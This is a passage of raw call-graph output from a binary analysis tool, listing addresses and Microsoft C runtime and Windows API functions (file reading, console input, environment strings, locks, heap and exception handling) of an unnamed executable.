20842->20803 20844 5bda1a 20843->20844 20844->20842 20845 5b8744 _Ungetc 29 API calls 20844->20845 20846 5bda28 20845->20846 20847 5b8744 _Ungetc 29 API calls 20846->20847 20847->20842 20849 5bd789 20848->20849 20850 5bd796 20849->20850 20855 5bd7ae 20849->20855 20851 5b0ee4 __strnicoll 14 API calls 20850->20851 20852 5bd79b 20851->20852 20853 5b15cf __strnicoll 29 API calls 20852->20853 20854 5b21a0 20853->20854 20854->20787 20855->20854 20856 5bd80d 20855->20856 20857 5bf0bf _Ungetc 14 API calls 20855->20857 20858 5b8744 _Ungetc 29 API calls 20856->20858 20857->20856 20859 5bd826 20858->20859 20869 5c2923 20859->20869 20862 5b8744 _Ungetc 29 API calls 20863 5bd85f 20862->20863 20863->20854 20864 5b8744 _Ungetc 29 API calls 20863->20864 20865 5bd86d 20864->20865 20865->20854 20866 5b8744 _Ungetc 29 API calls 20865->20866 20867 5bd87b 20866->20867 20868 5b8744 _Ungetc 29 API calls 20867->20868 20868->20854 20870 5c292f ___scrt_is_nonwritable_in_current_image 20869->20870 20871 5c2937 20870->20871 20876 5c2952 20870->20876 20872 5b0ef7 __dosmaperr 14 API calls 20871->20872 20873 5c293c 20872->20873 20874 5b0ee4 __strnicoll 14 API calls 20873->20874 20898 5bd82e 20874->20898 20875 5c2969 20878 5b0ef7 __dosmaperr 14 API calls 20875->20878 20876->20875 20877 5c29a4 20876->20877 20879 5c29ad 20877->20879 20880 5c29c2 20877->20880 20881 5c296e 20878->20881 20882 5b0ef7 __dosmaperr 14 API calls 20879->20882 20899 5bc918 EnterCriticalSection 20880->20899 20884 5b0ee4 __strnicoll 14 API calls 20881->20884 20886 5c29b2 20882->20886 20885 5c2976 20884->20885 20891 5b15cf __strnicoll 29 API calls 20885->20891 20888 5b0ee4 __strnicoll 14 API calls 20886->20888 20887 5c29c8 20889 5c29fc 20887->20889 20890 5c29e7 20887->20890 20888->20885 20900 5c2a3c 20889->20900 20893 5b0ee4 __strnicoll 14 API calls 20890->20893 20891->20898 20894 5c29ec 20893->20894 20896 5b0ef7 __dosmaperr 14 API calls 20894->20896 20895 5c29f7 20963 5c2a34 20895->20963 20896->20895 20898->20854 20898->20862 20899->20887 20901 5c2a4e 20900->20901 20902 5c2a66 20900->20902 20904 5b0ef7 __dosmaperr 14 API calls 20901->20904 20903 5c2da8 20902->20903 20908 5c2aa9 20902->20908 20906 5b0ef7 __dosmaperr 14 API calls 20903->20906 20905 5c2a53 20904->20905 20909 5b0ee4 __strnicoll 14 API calls 20905->20909 20907 5c2dad 20906->20907 20911 5b0ee4 __strnicoll 14 API calls 20907->20911 20910 5c2a5b 20908->20910 20912 5c2ab4 20908->20912 20918 5c2ae4 20908->20918 20909->20910 20910->20895 20913 5c2ac1 20911->20913 20914 5b0ef7 __dosmaperr 14 API calls 20912->20914 20916 5b15cf __strnicoll 29 API calls 20913->20916 20915 5c2ab9 20914->20915 20917 5b0ee4 __strnicoll 14 API calls 20915->20917 20916->20910 20917->20913 20919 5c2afd 20918->20919 20920 5c2b38 20918->20920 20921 5c2b0a 20918->20921 20919->20921 20954 5c2b26 20919->20954 20924 5b4ff1 __strnicoll 15 API calls 20920->20924 20922 5b0ef7 __dosmaperr 14 API calls 20921->20922 20923 5c2b0f 20922->20923 20925 5b0ee4 __strnicoll 14 API calls 20923->20925 20927 5c2b49 20924->20927 20928 5c2b16 20925->20928 20930 5b4fb7 ___free_lconv_mon 14 API calls 20927->20930 20931 5b15cf __strnicoll 29 API calls 20928->20931 20929 5c2c84 20932 5c2cf8 20929->20932 20936 5c2c9d GetConsoleMode 20929->20936 20933 5c2b52 20930->20933 20962 5c2b21 20931->20962 20935 5c2cfc ReadFile 20932->20935 20934 5b4fb7 ___free_lconv_mon 14 API calls 20933->20934 20937 5c2b59 20934->20937 20938 5c2d14 20935->20938 20939 5c2d70 GetLastError 20935->20939 20936->20932 20940 5c2cae 20936->20940 20941 5c2b7e 20937->20941 20942 5c2b63 20937->20942 20938->20939 20949 5c2ced 20938->20949 20943 5c2d7d 20939->20943 20951 5c2cd4 20939->20951 20940->20935 20944 5c2cb4 ReadConsoleW 20940->20944 20966 5bba12 20941->20966 20946 5b0ee4 __strnicoll 14 API calls 20942->20946 20947 5b0ee4 __strnicoll 14 API calls 20943->20947 20944->20949 20950 5c2cce GetLastError 20944->20950 20945 5b4fb7 ___free_lconv_mon 14 API calls 20945->20910 20952 5c2b68 20946->20952 20953 5c2d82 20947->20953 20958 5c2d39 20949->20958 20959 5c2d50 20949->20959 20949->20962 20950->20951 20955 5b0f0a __dosmaperr 14 API calls 20951->20955 20951->20962 20956 5b0ef7 __dosmaperr 14 API calls 20952->20956 20957 5b0ef7 __dosmaperr 14 API calls 20953->20957 20970 5bfd5f 20954->20970 20955->20962 20956->20962 20957->20962 20979 5c2e45 20958->20979 20959->20962 20992 5c30e9 20959->20992 20962->20945 21010 5bc93b LeaveCriticalSection 20963->21010 20965 5c2a3a 20965->20898 20967 5bba26 _Fputc 20966->20967 20998 5bbbb3 20967->20998 20969 5bba3b _Fputc 20969->20954 20971 5bfd6c 20970->20971 20972 5bfd79 20970->20972 20973 5b0ee4 __strnicoll 14 API calls 20971->20973 20974 5bfd85 20972->20974 20975 5b0ee4 __strnicoll 14 API calls 20972->20975 20976 5bfd71 20973->20976 20974->20929 20977 5bfda6 20975->20977 20976->20929 20978 5b15cf __strnicoll 29 API calls 20977->20978 20978->20976 21004 5c2f9c 20979->21004 20981 5b503f __strnicoll MultiByteToWideChar 20983 5c2f59 20981->20983 20986 5c2f62 GetLastError 20983->20986 20989 5c2e8d 20983->20989 20984 5c2ee7 20990 5c2ea1 20984->20990 20991 5bba12 31 API calls 20984->20991 20985 5c2ed7 20987 5b0ee4 __strnicoll 14 API calls 20985->20987 20987->20989 20989->20962 20990->20981 20991->20990 20993 5c3123 20992->20993 20994 5c31b9 ReadFile 20993->20994 20995 5c31b4 20993->20995 20994->20995 20996 5c31d6 20994->20996 20995->20962 20996->20995 20997 5bba12 31 API calls 20996->20997 20997->20995 20999 5bc6cf _Fputc 29 API calls 20998->20999 21000 5bbbc5 20999->21000 21001 5bbbe1 SetFilePointerEx 21000->21001 21002 5bbbcd _Fputc 21000->21002 21001->21002 21003 5bbbf9 GetLastError 21001->21003 21002->20969 21003->21002 21005 5c2fd0 21004->21005 21006 5c3041 ReadFile 21005->21006 21007 5c2e5c 21005->21007 21006->21007 21008 5c305a 21006->21008 21007->20984 21007->20985 21007->20989 21007->20990 21008->21007 21009 5bba12 31 API calls 21008->21009 21009->21007 21010->20965 21013 5b8625 21011->21013 21022 5b8635 21011->21022 21012 5b865a 21015 5b866b 21012->21015 21016 5b868e 21012->21016 21013->21012 21014 5ad190 _Fputc 39 API calls 21013->21014 21013->21022 21014->21012 21023 5c18a2 21015->21023 21018 5b870a 21016->21018 21019 5b86b6 21016->21019 21016->21022 21020 5b503f __strnicoll MultiByteToWideChar 21018->21020 21021 5b503f __strnicoll MultiByteToWideChar 21019->21021 21019->21022 21020->21022 21021->21022 21022->20826 21026 5c3aa3 21023->21026 21029 5c3ad1 _Fputc 21026->21029 21027 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 21028 5c18bd 21027->21028 21028->21022 21029->21027 21030->20806 21031->20720 21033 5b217f 21032->21033 21034 5b2194 21032->21034 21035 5b0ee4 __strnicoll 14 API calls 21033->21035 21036 5b21a3 21034->21036 21038 5bd773 43 API calls 21034->21038 21037 5b2184 21035->21037 21036->20728 21039 5b15cf __strnicoll 29 API calls 21037->21039 21040 5b21a0 21038->21040 21041 5b218f 21039->21041 21040->20728 21041->20728 21045 5acd23 LeaveCriticalSection 21042->21045 21044 5b2171 21044->20732 21045->21044 21047 5a8c73 21046->21047 21048 5a8be3 21046->21048 21050 5a4de0 std::ios_base::_Init 30 API calls 21047->21050 21049 5a4ea0 std::ios_base::_Init 5 API calls 21048->21049 21051 5a8bf5 21049->21051 21052 5a8c78 21050->21052 21053 5a50c0 std::ios_base::_Init 30 API calls 21051->21053 21054 5a8c00 _Yarn 21053->21054 21055 5a8c41 _Yarn 21054->21055 21056 5a5ee0 std::ios_base::_Init 29 API calls 21054->21056 21055->20736 21056->21055 21057->20747 21059 5b3582 21058->21059 21061 5b35f2 21058->21061 21060 5b8744 _Ungetc 29 API calls 21059->21060 21065 5b3588 21060->21065 21062 5bf0bf _Ungetc 14 API calls 21061->21062 21063 5b3537 21061->21063 21062->21063 21069 5b3562 21063->21069 21064 5b35da 21066 5b0ee4 __strnicoll 14 API calls 21064->21066 21065->21061 21065->21064 21067 5b35df 21066->21067 21068 5b15cf __strnicoll 29 API calls 21067->21068 21068->21063 21072 5acd23 LeaveCriticalSection 21069->21072 21071 5b3568 21071->20751 21072->21071 16708 5a9d22 16709 5a9d2e ___scrt_is_nonwritable_in_current_image 16708->16709 16734 5a6f4a 16709->16734 16711 5a9d35 16712 5a9e8e 16711->16712 16722 5a9d5f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 16711->16722 16772 5a9643 IsProcessorFeaturePresent 16712->16772 16714 5a9e95 16752 5aed49 16714->16752 16719 5a9d7e 16720 5a9dff 16745 5b12bc 16720->16745 16722->16719 16722->16720 16755 5aed93 16722->16755 16724 5a9e05 16749 5a2350 6 API calls 16724->16749 16729 5a9e2a 16730 5a9e33 16729->16730 16763 5aed75 16729->16763 16766 5a6f83 16730->16766 16735 5a6f53 16734->16735 16779 5a92ab IsProcessorFeaturePresent 16735->16779 16739 5a6f64 16740 5a6f68 16739->16740 16789 5acc70 16739->16789 16740->16711 16743 5a6f7f 16743->16711 16746 5b12c5 16745->16746 16748 5b12ca 16745->16748 16861 5b13e5 16746->16861 16748->16724 16750 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16749->16750 17773 5a2340 16749->17773 16751 5a241c 16750->16751 16761 5a95f0 GetModuleHandleW 16751->16761 18254 5aee94 16752->18254 16756 5aeda9 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 16755->16756 16756->16720 16757 5b524a __Getctype 39 API calls 16756->16757 16760 5b34cc 16757->16760 16758 5b1b53 CallUnexpected 39 API calls 16759 5b34f6 16758->16759 16760->16758 16762 5a95fc 16761->16762 16762->16714 16762->16729 16764 5aee94 std::locale::_Setgloballocale 21 API calls 16763->16764 16765 5aed80 16764->16765 16765->16730 16767 5a6f8f 16766->16767 16771 5a6fa5 16767->16771 18327 5acc82 16767->18327 16769 5a6f9d 16770 5aa71e ___scrt_uninitialize_crt 7 API calls 16769->16770 16770->16771 16771->16719 16773 5a9659 std::locale::_Setgloballocale std::bad_exception::bad_exception 16772->16773 16774 5a9704 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16773->16774 16775 5a9748 std::locale::_Setgloballocale 16774->16775 16775->16714 16776 5aed5f 16777 5aee94 std::locale::_Setgloballocale 21 API calls 16776->16777 16778 5a9ea3 16777->16778 16780 5a6f5f 16779->16780 16781 5aa6ff 16780->16781 16798 5b4c86 16781->16798 16785 5aa710 16786 5aa71b 16785->16786 16812 5b4cc2 16785->16812 16786->16739 16788 5aa708 16788->16739 16852 5b7329 16789->16852 16792 5aa71e 16793 5aa731 16792->16793 16794 5aa727 16792->16794 16793->16740 16795 5b3d4b ___vcrt_uninitialize_ptd 6 API calls 16794->16795 16796 5aa72c 16795->16796 16797 5b4cc2 ___vcrt_uninitialize_locks DeleteCriticalSection 16796->16797 16797->16793 16799 5b4c8f 16798->16799 16801 5b4cb8 16799->16801 16802 5aa704 16799->16802 16816 5bf20a 16799->16816 16803 5b4cc2 ___vcrt_uninitialize_locks DeleteCriticalSection 16801->16803 16802->16788 16804 5b3d18 16802->16804 16803->16802 16833 5bf11b 16804->16833 16809 5b3d48 16809->16785 16811 5b3d2d 16811->16785 16813 5b4cec 16812->16813 16814 5b4ccd 16812->16814 16813->16788 16815 5b4cd7 DeleteCriticalSection 16814->16815 16815->16813 16815->16815 16821 5bf29c 16816->16821 16819 5bf242 InitializeCriticalSectionAndSpinCount 16820 5bf22d 16819->16820 16820->16799 16822 5bf224 16821->16822 16823 5bf2bd 16821->16823 16822->16819 16822->16820 16823->16822 16824 5bf325 GetProcAddress 16823->16824 16826 5bf316 16823->16826 16828 5bf251 LoadLibraryExW 16823->16828 16824->16822 16826->16824 16827 5bf31e FreeLibrary 16826->16827 16827->16824 16829 5bf298 16828->16829 16830 5bf268 GetLastError 16828->16830 16829->16823 16830->16829 16831 5bf273 ___vcrt_InitializeCriticalSectionEx 16830->16831 16831->16829 16832 5bf289 LoadLibraryExW 16831->16832 16832->16823 16834 5bf29c ___vcrt_InitializeCriticalSectionEx 5 API calls 16833->16834 16835 5bf135 16834->16835 16836 5bf14e TlsAlloc 16835->16836 16837 5b3d22 16835->16837 16837->16811 16838 5bf1cc 16837->16838 16839 5bf29c ___vcrt_InitializeCriticalSectionEx 5 API calls 16838->16839 16840 5bf1e6 16839->16840 16841 5bf201 TlsSetValue 16840->16841 16842 5b3d3b 16840->16842 16841->16842 16842->16809 16843 5b3d4b 16842->16843 16844 5b3d5b 16843->16844 16845 5b3d55 16843->16845 16844->16811 16847 5bf156 16845->16847 16848 5bf29c ___vcrt_InitializeCriticalSectionEx 5 API calls 16847->16848 16849 5bf170 16848->16849 16850 5bf188 TlsFree 16849->16850 16851 5bf17c 16849->16851 16850->16851 16851->16844 16853 5b7339 16852->16853 16854 5a6f71 16852->16854 16853->16854 16856 5b6a92 16853->16856 16854->16743 16854->16792 16858 5b6a99 16856->16858 16857 5b6adc GetStdHandle 16857->16858 16858->16857 16859 5b6b3e 16858->16859 16860 5b6aef GetFileType 16858->16860 16859->16853 16860->16858 16862 5b1404 16861->16862 16863 5b13ee 16861->16863 16862->16748 16863->16862 16867 5b1326 16863->16867 16865 5b13fb 16865->16862 16884 5b14f3 16865->16884 16868 5b132f 16867->16868 16869 5b1332 16867->16869 16868->16865 16893 5b6b60 16869->16893 16874 5b134f 16926 5b1411 16874->16926 16875 5b1343 16920 5b4fb7 16875->16920 16880 5b4fb7 ___free_lconv_mon 14 API calls 16881 5b1373 16880->16881 16882 5b4fb7 ___free_lconv_mon 14 API calls 16881->16882 16883 5b1379 16882->16883 16883->16865 16885 5b1564 16884->16885 16890 5b1502 16884->16890 16885->16862 16886 5b62f4 __Getctype 14 API calls 16886->16890 16887 5b1568 16888 5b4fb7 ___free_lconv_mon 14 API calls 16887->16888 16888->16885 16889 5b5101 WideCharToMultiByte _Fputc 16889->16890 16890->16885 16890->16886 16890->16887 16890->16889 16892 5b4fb7 ___free_lconv_mon 14 API calls 16890->16892 17492 5bc345 16890->17492 16892->16890 16894 5b6b69 16893->16894 16895 5b1338 16893->16895 16948 5b5305 16894->16948 16899 5bc26e GetEnvironmentStringsW 16895->16899 16900 5b133d 16899->16900 16901 5bc286 16899->16901 16900->16874 16900->16875 16902 5b5101 _Fputc WideCharToMultiByte 16901->16902 16903 5bc2a3 16902->16903 16904 5bc2b8 16903->16904 16905 5bc2ad FreeEnvironmentStringsW 16903->16905 16906 5b4ff1 __strnicoll 15 API calls 16904->16906 16905->16900 16907 5bc2bf 16906->16907 16908 5bc2d8 16907->16908 16909 5bc2c7 16907->16909 16910 5b5101 _Fputc WideCharToMultiByte 16908->16910 16911 5b4fb7 ___free_lconv_mon 14 API calls 16909->16911 16913 5bc2e8 16910->16913 16912 5bc2cc FreeEnvironmentStringsW 16911->16912 16912->16900 16914 5bc2ef 16913->16914 16915 5bc2f7 16913->16915 16916 5b4fb7 ___free_lconv_mon 14 API calls 16914->16916 16917 5b4fb7 ___free_lconv_mon 14 API calls 16915->16917 16918 5bc2f5 FreeEnvironmentStringsW 16916->16918 16917->16918 16918->16900 16921 5b1349 16920->16921 16922 5b4fc2 HeapFree 16920->16922 16921->16865 16922->16921 16923 5b4fd7 GetLastError 16922->16923 16924 5b4fe4 __dosmaperr 16923->16924 16925 5b0ee4 __strnicoll 12 API calls 16924->16925 16925->16921 16927 5b1426 16926->16927 16928 5b62f4 __Getctype 14 API calls 16927->16928 16929 5b144d 16928->16929 16930 5b1455 16929->16930 16936 5b145f 16929->16936 16931 5b4fb7 ___free_lconv_mon 14 API calls 16930->16931 16932 5b1356 16931->16932 16932->16880 16933 5b14bc 16934 5b4fb7 ___free_lconv_mon 14 API calls 16933->16934 16934->16932 16935 5b62f4 __Getctype 14 API calls 16935->16936 16936->16933 16936->16935 16937 5b14cb 16936->16937 16942 5b14e6 16936->16942 16944 5b4fb7 ___free_lconv_mon 14 API calls 16936->16944 17473 5b4c2c 16936->17473 17482 5b13b6 16937->17482 16941 5b4fb7 ___free_lconv_mon 14 API calls 16943 5b14d8 16941->16943 17488 5b15fc IsProcessorFeaturePresent 16942->17488 16946 5b4fb7 ___free_lconv_mon 14 API calls 16943->16946 16944->16936 16946->16932 16947 5b14f2 16949 5b5316 16948->16949 16950 5b5310 16948->16950 16969 5b531c 16949->16969 17000 5b5cb3 16949->17000 16995 5b5c74 16950->16995 16958 5b5348 16960 5b5cb3 __Getctype 6 API calls 16958->16960 16959 5b535d 16961 5b5cb3 __Getctype 6 API calls 16959->16961 16970 5b5354 16960->16970 16962 5b5369 16961->16962 16963 5b536d 16962->16963 16964 5b537c 16962->16964 16967 5b5cb3 __Getctype 6 API calls 16963->16967 17012 5b555c 16964->17012 16966 5b4fb7 ___free_lconv_mon 14 API calls 16966->16969 16967->16970 16972 5b5321 16969->16972 17017 5b1b53 16969->17017 16970->16966 16973 5b6f21 16972->16973 16974 5b6f4b 16973->16974 17291 5b6dad 16974->17291 16979 5b6f8b 17305 5b6ba8 16979->17305 16980 5b6f7d 16982 5b4fb7 ___free_lconv_mon 14 API calls 16980->16982 16984 5b6f64 16982->16984 16984->16895 16985 5b6fc3 16986 5b0ee4 __strnicoll 14 API calls 16985->16986 16987 5b6fc8 16986->16987 16990 5b4fb7 ___free_lconv_mon 14 API calls 16987->16990 16988 5b700a 16989 5b7053 16988->16989 17316 5b72dc 16988->17316 16993 5b4fb7 ___free_lconv_mon 14 API calls 16989->16993 16990->16984 16991 5b6fde 16991->16988 16994 5b4fb7 ___free_lconv_mon 14 API calls 16991->16994 16993->16984 16994->16988 17028 5b600d 16995->17028 16998 5b5cab TlsGetValue 16999 5b5c99 16999->16949 17001 5b600d std::_Lockit::_Lockit 5 API calls 17000->17001 17002 5b5ccf 17001->17002 17003 5b5330 17002->17003 17004 5b5ced TlsSetValue 17002->17004 17003->16969 17005 5b62f4 17003->17005 17011 5b6301 __Getctype 17005->17011 17006 5b6341 17046 5b0ee4 17006->17046 17007 5b632c RtlAllocateHeap 17009 5b5340 17007->17009 17007->17011 17009->16958 17009->16959 17011->17006 17011->17007 17043 5af07b 17011->17043 17083 5b56c2 17012->17083 17185 5b73e0 17017->17185 17021 5b1b6d IsProcessorFeaturePresent 17023 5b1b79 17021->17023 17022 5b1b63 17022->17021 17027 5b1b8c 17022->17027 17215 5b1630 17023->17215 17024 5aed5f std::locale::_Setgloballocale 21 API calls 17025 5b1b96 17024->17025 17027->17024 17029 5b603d 17028->17029 17033 5b5c90 17028->17033 17029->17033 17035 5b5f42 17029->17035 17032 5b6057 GetProcAddress 17032->17033 17034 5b6067 std::_Lockit::_Lockit 17032->17034 17033->16998 17033->16999 17034->17033 17036 5b5f53 ___vcrt_InitializeCriticalSectionEx 17035->17036 17037 5b5fe9 17036->17037 17038 5b5f71 LoadLibraryExW 17036->17038 17042 5b5fbf LoadLibraryExW 17036->17042 17037->17032 17037->17033 17039 5b5f8c GetLastError 17038->17039 17040 5b5ff0 17038->17040 17039->17036 17040->17037 17041 5b6002 FreeLibrary 17040->17041 17041->17037 17042->17036 17042->17040 17049 5af0b6 17043->17049 17060 5b539b GetLastError 17046->17060 17048 5b0ee9 17048->17009 17050 5af0c2 ___scrt_is_nonwritable_in_current_image 17049->17050 17055 5b18e1 EnterCriticalSection 17050->17055 17052 5af0cd std::locale::_Setgloballocale 17056 5af104 17052->17056 17055->17052 17059 5b18f8 LeaveCriticalSection 17056->17059 17058 5af086 17058->17011 17059->17058 17061 5b53b7 17060->17061 17062 5b53b1 17060->17062 17063 5b5cb3 __Getctype 6 API calls 17061->17063 17066 5b53bb SetLastError 17061->17066 17064 5b5c74 __Getctype 6 API calls 17062->17064 17065 5b53d3 17063->17065 17064->17061 17065->17066 17068 5b62f4 __Getctype 12 API calls 17065->17068 17066->17048 17069 5b53e8 17068->17069 17070 5b5401 17069->17070 17071 5b53f0 17069->17071 17073 5b5cb3 __Getctype 6 API calls 17070->17073 17072 5b5cb3 __Getctype 6 API calls 17071->17072 17081 5b53fe 17072->17081 17074 5b540d 17073->17074 17075 5b5428 17074->17075 17076 5b5411 17074->17076 17078 5b555c __Getctype 12 API calls 17075->17078 17079 5b5cb3 __Getctype 6 API calls 17076->17079 17077 5b4fb7 ___free_lconv_mon 12 API calls 17077->17066 17080 5b5433 17078->17080 17079->17081 17082 5b4fb7 ___free_lconv_mon 12 API calls 17080->17082 17081->17077 17082->17066 17084 5b56ce ___scrt_is_nonwritable_in_current_image 17083->17084 17097 5b18e1 EnterCriticalSection 17084->17097 17086 5b56d8 17098 5b5708 17086->17098 17089 5b5714 17090 5b5720 ___scrt_is_nonwritable_in_current_image 17089->17090 17102 5b18e1 EnterCriticalSection 17090->17102 17092 5b572a 17103 5b5511 17092->17103 17094 5b5742 17107 5b5762 17094->17107 17097->17086 17101 5b18f8 LeaveCriticalSection 17098->17101 17100 5b55ca 17100->17089 17101->17100 17102->17092 17104 5b5547 __Getctype 17103->17104 17105 5b5520 __Getctype 17103->17105 17104->17094 17105->17104 17110 5b978a 17105->17110 17184 5b18f8 LeaveCriticalSection 17107->17184 17111 5b97a0 17110->17111 17113 5b980a 17110->17113 17111->17113 17115 5b97d3 17111->17115 17120 5b4fb7 ___free_lconv_mon 14 API calls 17111->17120 17114 5b4fb7 ___free_lconv_mon 14 API calls 17113->17114 17137 5b9858 17113->17137 17221 5b7663 17185->17221 17188 5b7407 17189 5b7413 ___scrt_is_nonwritable_in_current_image 17188->17189 17190 5b539b __strnicoll 14 API calls 17189->17190 17191 5b7463 17189->17191 17192 5b7475 std::locale::_Setgloballocale 17189->17192 17197 5b7444 std::locale::_Setgloballocale 17189->17197 17190->17197 17193 5b0ee4 __strnicoll 14 API calls 17191->17193 17194 5b74ab std::locale::_Setgloballocale 17192->17194 17235 5b18e1 EnterCriticalSection 17192->17235 17195 5b7468 17193->17195 17200 5b74e8 17194->17200 17201 5b75e5 17194->17201 17211 5b7516 17194->17211 17232 5b15cf 17195->17232 17197->17191 17197->17192 17214 5b744d 17197->17214 17200->17211 17236 5b524a GetLastError 17200->17236 17202 5b75f0 17201->17202 17267 5b18f8 LeaveCriticalSection 17201->17267 17205 5aed5f std::locale::_Setgloballocale 21 API calls 17202->17205 17207 5b75f8 17205->17207 17208 5b524a __Getctype 39 API calls 17212 5b756b 17208->17212 17210 5b524a __Getctype 39 API calls 17210->17211 17263 5b7591 17211->17263 17213 5b524a __Getctype 39 API calls 17212->17213 17212->17214 17213->17214 17214->17022 17216 5b164c std::locale::_Setgloballocale std::bad_exception::bad_exception 17215->17216 17217 5b1678 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17216->17217 17220 5b1749 std::locale::_Setgloballocale 17217->17220 17219 5b1767 17219->17027 17283 5a6d61 17220->17283 17222 5b766f ___scrt_is_nonwritable_in_current_image 17221->17222 17227 5b18e1 EnterCriticalSection 17222->17227 17224 5b767d 17228 5b76bf 17224->17228 17227->17224 17231 5b18f8 LeaveCriticalSection 17228->17231 17230 5b1b58 17230->17022 17230->17188 17231->17230 17268 5b181e 17232->17268 17234 5b15db 17234->17214 17235->17194 17237 5b5260 17236->17237 17241 5b5266 17236->17241 17239 5b5c74 __Getctype 6 API calls 17237->17239 17238 5b5cb3 __Getctype 6 API calls 17240 5b5282 17238->17240 17239->17241 17242 5b526a SetLastError 17240->17242 17244 5b62f4 __Getctype 14 API calls 17240->17244 17241->17238 17241->17242 17246 5b52fa 17242->17246 17247 5b52ff 17242->17247 17245 5b5297 17244->17245 17248 5b529f 17245->17248 17249 5b52b0 17245->17249 17246->17210 17250 5b1b53 CallUnexpected 37 API calls 17247->17250 17251 5b5cb3 __Getctype 6 API calls 17248->17251 17252 5b5cb3 __Getctype 6 API calls 17249->17252 17253 5b5304 17250->17253 17254 5b52ad 17251->17254 17255 5b52bc 17252->17255 17258 5b4fb7 ___free_lconv_mon 14 API calls 17254->17258 17256 5b52c0 17255->17256 17257 5b52d7 17255->17257 17260 5b5cb3 __Getctype 6 API calls 17256->17260 17259 5b555c __Getctype 14 API calls 17257->17259 17258->17242 17261 5b52e2 17259->17261 17260->17254 17262 5b4fb7 ___free_lconv_mon 14 API calls 17261->17262 17262->17242 17264 5b755d 17263->17264 17265 5b7595 17263->17265 17264->17208 17264->17212 17264->17214 17282 5b18f8 LeaveCriticalSection 17265->17282 17267->17202 17269 5b1830 _Fputc 17268->17269 17272 5b1778 17269->17272 17271 5b1848 _Fputc 17271->17234 17273 5b1788 17272->17273 17274 5b178f 17272->17274 17275 5ad1f0 _Fputc 16 API calls 17273->17275 17276 5b179d 17274->17276 17277 5b17f5 _Fputc GetLastError SetLastError 17274->17277 17275->17274 17276->17271 17278 5b17c4 17277->17278 17278->17276 17279 5b17ef 17278->17279 17280 5b15fc __Getctype 11 API calls 17279->17280 17281 5b17f4 17280->17281 17282->17264 17284 5a6d6a IsProcessorFeaturePresent 17283->17284 17285 5a6d69 17283->17285 17287 5a919d 17284->17287 17285->17219 17290 5a9283 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17287->17290 17289 5a9280 17289->17219 17290->17289 17324 5ac3ba 17291->17324 17294 5b6dce GetOEMCP 17296 5b6df7 17294->17296 17295 5b6de0 17295->17296 17297 5b6de5 GetACP 17295->17297 17296->16984 17298 5b4ff1 17296->17298 17297->17296 17299 5b502f 17298->17299 17304 5b4fff __Getctype 17298->17304 17300 5b0ee4 __strnicoll 14 API calls 17299->17300 17302 5b502d 17300->17302 17301 5b501a RtlAllocateHeap 17301->17302 17301->17304 17302->16979 17302->16980 17303 5af07b std::ios_base::_Init 2 API calls 17303->17304 17304->17299 17304->17301 17304->17303 17306 5b6dad 41 API calls 17305->17306 17307 5b6bc8 17306->17307 17309 5b6c05 IsValidCodePage 17307->17309 17313 5b6ccd 17307->17313 17315 5b6c20 std::bad_exception::bad_exception 17307->17315 17308 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17310 5b6dab 17308->17310 17311 5b6c17 17309->17311 17309->17313 17310->16985 17310->16991 17312 5b6c40 GetCPInfo 17311->17312 17311->17315 17312->17313 17312->17315 17313->17308 17364 5b7137 17315->17364 17317 5b72e8 ___scrt_is_nonwritable_in_current_image 17316->17317 17447 5b18e1 EnterCriticalSection 17317->17447 17319 5b72f2 17448 5b7076 17319->17448 17325 5ac3d8 17324->17325 17331 5ac3d1 17324->17331 17326 5b524a __Getctype 39 API calls 17325->17326 17325->17331 17327 5ac3f9 17326->17327 17332 5b582e 17327->17332 17331->17294 17331->17295 17333 5ac40f 17332->17333 17334 5b5841 17332->17334 17336 5b585b 17333->17336 17334->17333 17340 5b9955 17334->17340 17337 5b586e 17336->17337 17338 5b5883 17336->17338 17337->17338 17361 5b6b42 17337->17361 17338->17331 17341 5b9961 ___scrt_is_nonwritable_in_current_image 17340->17341 17342 5b524a __Getctype 39 API calls 17341->17342 17343 5b996a 17342->17343 17350 5b99b0 17343->17350 17353 5b18e1 EnterCriticalSection 17343->17353 17345 5b9988 17354 5b99d6 17345->17354 17350->17333 17351 5b1b53 CallUnexpected 39 API calls 17352 5b99d5 17351->17352 17353->17345 17355 5b99e4 __Getctype 17354->17355 17357 5b9999 17354->17357 17356 5b978a __Getctype 14 API calls 17355->17356 17355->17357 17356->17357 17358 5b99b5 17357->17358 17359 5b18f8 std::_Lockit::~_Lockit LeaveCriticalSection 17358->17359 17360 5b99ac 17359->17360 17360->17350 17360->17351 17362 5b524a __Getctype 39 API calls 17361->17362 17363 5b6b47 17362->17363 17363->17338 17365 5b715f GetCPInfo 17364->17365 17374 5b7228 17364->17374 17370 5b7177 17365->17370 17365->17374 17367 5a6d61 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17369 5b72da 17367->17369 17369->17313 17375 5b65e0 17370->17375 17374->17367 17376 5ac3ba __strnicoll 39 API calls 17375->17376 17377 5b6600 17376->17377 17395 5b503f 17377->17395 17381 5b662d 17402 5b5069 17395->17402 17403 5b505b MultiByteToWideChar 17402->17403 17403->17381 17447->17319 17458 5b2f8b 17448->17458 17474 5b4c48 17473->17474 17475 5b4c3a 17473->17475 17476 5b0ee4 __strnicoll 14 API calls 17474->17476 17475->17474 17479 5b4c60 17475->17479 17481 5b4c50 17476->17481 17477 5b15cf __strnicoll 29 API calls 17478 5b4c5a 17477->17478 17478->16936 17479->17478 17480 5b0ee4 __strnicoll 14 API calls 17479->17480 17480->17481 17481->17477 17483 5b13c3 17482->17483 17487 5b13e0 17482->17487 17484 5b13da 17483->17484 17485 5b4fb7 ___free_lconv_mon 14 API calls 17483->17485 17486 5b4fb7 ___free_lconv_mon 14 API calls 17484->17486 17485->17483 17486->17487 17487->16941 17489 5b1608 17488->17489 17490 